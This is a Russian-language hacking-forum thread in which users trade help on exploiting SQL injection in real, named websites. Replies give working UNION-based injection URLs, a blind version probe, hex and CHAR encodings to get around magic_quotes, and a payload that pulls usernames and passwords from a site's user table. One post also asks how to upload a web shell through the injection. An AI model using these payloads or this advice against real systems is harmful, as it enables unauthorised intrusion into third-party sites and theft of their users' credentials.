Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. [R]eD

    [R]eD Elder - Старейшина

    Joined:
    1 Aug 2006
    Messages:
    72
    Likes Received:
    1
    Reputations:
    0
    Есть иньекция, все бы было хорошо, но имя базы содержит знак тире " - ", в итоге при from data-base.users вылазит ошибка в синтаксисе, как можно обойти?
     
  2. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    `data-base`.users
     
    1 person likes this.
  3. Artrix

    Artrix New Member

    Joined:
    13 Dec 2012
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Вечер добрый. Допустим есть такой сайт:
    http://www.site.ru/catalog/detailed/22/
    Подставляю ' вылазит Mysql ошибка. Как данную уязвимость раскручивать?
     
  4. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Как и все остальные, разве что может получиться так, что придется делать без пробельный вариант или заменять их на /**/ например!
     
  5. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    помогите
    уязвимость вроде есть а чёт не получается дальше раскрутить
    http://www.shpl.ru/shpage.php?menu=2343'

    Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/shpl.d2/bib/set.inc on line 159
     
  6. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Code:
    http://www.shpl.ru/shpage.php?menu=2343) and mid(version(),1,1)=3 and (1=1
    Версия 3, тогда небыло не UNION не даже подзапросов, так что только слепые методы тебе помогут!
     
    3 people like this.
  7. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Как залить шелл через sqli методом error based?
     
  8. m00c0w

    m00c0w Banned

    Joined:
    25 Dec 2011
    Messages:
    104
    Likes Received:
    14
    Reputations:
    5
    если file_priv есть, в чем проблема?
     
  9. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Проблем может быть куча, начиная от magic_quotes и заканчивая не знанием путей, хотя последнее чаще всего решается! ;)
     
  10. comynicator

    comynicator New Member

    Joined:
    20 Mar 2012
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Что посоветуете?

    Допустим нужно узнать привилегии но magic_quotes=on
    Понимаю или чарить или хек.Вопрос пробиваю user() пишет Future_future2@localhost
    Что именно тут имя юзера? Полностью или до @?И как вставить имя в хек или чар?
     
  11. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    User - Future_future2
    HEX - 0x4675747572655f66757475726532
    CHAR(MySQL) - CHAR(70, 117, 116, 117, 114, 101, 95, 102, 117, 116, 117, 114, 101, 50)
     
  12. comynicator

    comynicator New Member

    Joined:
    20 Mar 2012
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Спасибо за ответ.вот зачарено
    http://www.site.com/fin-detail.php?id=173/**/union/**/all/**/select/**/1,file_priv,3,4,5,6,7,8,9,10,11/**/from/**/mysql.user/**/where/**/user=char(70,117,116,117,114,101,95,102,117,116,117,114,101,50)--
    Ответ
    SELECT command denied to user 'Future_future2'@'localhost' for table 'user'
    Вот хек
    http://www.site.com/fin-detail.php?id=173/**/union/**/all/**/select/**/1,file_priv,3,4,5,6,7,8,9,10,11/**/from/**/mysql.user/**/where/**/user=0x4675747572655f66757475726532--
    ответ
    SELECT command denied to user 'Future_future2'@'localhost' for table 'user'
     
    #21732 comynicator, 13 Jan 2013
    Last edited: 13 Jan 2013
  13. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108

    А матчасть почитать сначала??? Ясно же написано что вышеуказанный пользователь не имеет прав на доступ к системной таблице mysql!
     
  14. FunOfGun

    FunOfGun Elder - Старейшина

    Joined:
    5 Sep 2012
    Messages:
    388
    Likes Received:
    72
    Reputations:
    124
    Здравствуйте, помогите, туплю. http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15+from+information_schema.tables+--+ есть таблица ltw_usersv4, в ней есть колонка username, пытаюсь достать ее так: http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,username,12,13,14,15+from+ltw_usersv4+limit+0,1+--+ и ничего не получаю. Что я делаю не так? Заранее благодарен.
     
  15. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Code:
     http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,username,password),12,13,14,15+from+Marketing.ltw_usersv4--+
    Эта таблица находится в другой бд, в твоей ничего подобного нет. Учти другая БД - может быть другой сайт! ;)
     
    1 person likes this.
  16. FunOfGun

    FunOfGun Elder - Старейшина

    Joined:
    5 Sep 2012
    Messages:
    388
    Likes Received:
    72
    Reputations:
    124
    Еще один глупый вопрос: как определить к какой именно базе прнадлежит таблица?
     
  17. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    FunOfGun,
    Code:
    http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,table_schema,12,13,14,15+from+information_schema.tables+where+table_name='ltw_usersv4'+--+
     
    1 person likes this.
  18. bestoloch

    bestoloch New Member

    Joined:
    13 Sep 2012
    Messages:
    8
    Likes Received:
    3
    Reputations:
    10
    вытаскивай просто таблицы подобными запросами:

    SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’

    Узнать текущую базу:

    SELECT database()
     
  19. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    [​IMG] Как раскрутить? Запрос был '+order+by+100
     
  20. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Т.К. url сайта Вы не даете, тогда могу только так помочь:
    Code:
    %')") [B]ЗДЕСЬ ВАШ ЗАПРОС[/B] -- -
     
    1 person likes this.
Thread Status:
Not open for further replies.